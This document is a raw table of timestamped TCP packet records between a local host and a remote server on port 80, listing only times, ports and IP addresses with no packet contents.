Apr 22, 2022 18:13:04.876631975 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.876657963 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876682997 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876698971 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876723051 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876782894 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876800060 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876898050 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876919031 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876945019 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.876972914 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.915833950 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.915863991 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.915879965 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.915903091 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.915918112 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.915951967 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.915993929 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.916152954 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.916178942 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.916191101 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.916208982 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.916220903 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.916330099 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.916378021 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.916404009 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.916421890 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.916435003 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.916450977 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.916479111 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.916496992 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.916532993 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.916542053 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.916569948 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.916811943 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.916836977 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.916855097 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.916872978 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.916933060 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.916965008 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.955667973 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.955715895 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.955737114 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.955773115 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.955807924 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.955838919 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.955889940 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.955897093 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.956182003 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.956242085 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.956259966 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.956260920 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.956306934 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.956309080 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.956346989 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.956363916 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.956444025 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.956638098 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.956690073 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.956713915 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.956724882 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.956743002 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.956772089 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.956825018 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.956825018 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.956861973 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.956880093 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.956907988 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.956955910 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.956959963 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.956991911 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.957006931 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.957040071 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.957092047 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.957097054 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.957129955 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.957178116 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.957209110 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.957283020 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.996402979 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.996479988 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.996520042 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.996550083 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.996577024 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.996582985 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.996617079 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.996645927 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.996684074 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.997056961 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997112989 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997140884 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.997148991 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997180939 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.997200012 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997251987 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997262001 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.997289896 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997320890 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.997342110 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997391939 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997422934 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.997430086 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997471094 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.997488976 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997541904 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997565985 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.997579098 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997611046 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.997632980 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997694016 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997703075 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.997733116 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997756958 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.997781992 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997843027 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997863054 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.997883081 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997899055 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.997925043 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997982979 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.036662102 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.036731958 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.036763906 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.036768913 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.036793947 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.036802053 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.036825895 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.036850929 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.036889076 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.036933899 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.036973953 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037004948 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.037012100 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037019014 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.037030935 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037071943 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037081003 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.037100077 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037125111 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.037138939 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037189007 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.037211895 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037239075 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037266016 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.037277937 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037319899 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037326097 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.037358046 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037369013 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.037451982 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037503958 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.037518024 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037549973 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037574053 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.037590981 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037630081 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037640095 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.037658930 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037681103 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.037885904 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037942886 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.076746941 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.076801062 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.076828957 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.076869011 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.076879025 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.076899052 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.076935053 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.076950073 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.077024937 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077094078 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077122927 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077168941 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.077276945 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.077296972 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077339888 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077366114 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077368021 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.077404976 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077428102 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.077442884 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077470064 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077478886 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.077538967 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.077608109 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077673912 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077685118 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.077704906 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077745914 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077747107 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.077785969 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077805996 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.077815056 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077853918 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077856064 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.077891111 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077905893 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.077919006 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077950001 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077959061 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.078017950 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.116153955 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.116202116 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.116231918 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.116271973 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.116275072 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.116301060 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.116305113 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.116360903 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.117312908 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.117353916 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.117386103 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.117398977 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.117427111 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.117441893 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.117470026 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.117500067 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.117508888 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.117533922 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.117597103 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.117635012 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.117662907 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.117675066 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.117691040 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.117705107 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.117775917 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.117778063 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.117804050 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.117862940 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.117918968 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.117959023 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.117988110 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.118006945 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.118020058 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.118030071 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.118069887 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.118087053 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.118098974 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.118119001 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.118130922 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.118217945 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.157643080 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.157674074 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.157711983 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.157725096 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.157758951 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.157794952 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.157821894 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.158320904 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.158348083 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.158361912 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.158375978 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.158381939 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.158401966 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.158405066 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.158427954 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.158452988 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.158468008 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.158621073 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.158648968 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.158659935 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.158683062 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.158696890 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.158761978 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.158799887 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.158806086 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.158848047 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.158883095 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.158970118 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.158994913 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.159013033 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.159034014 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.159039021 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.159063101 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.159080029 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.159081936 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.159111977 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
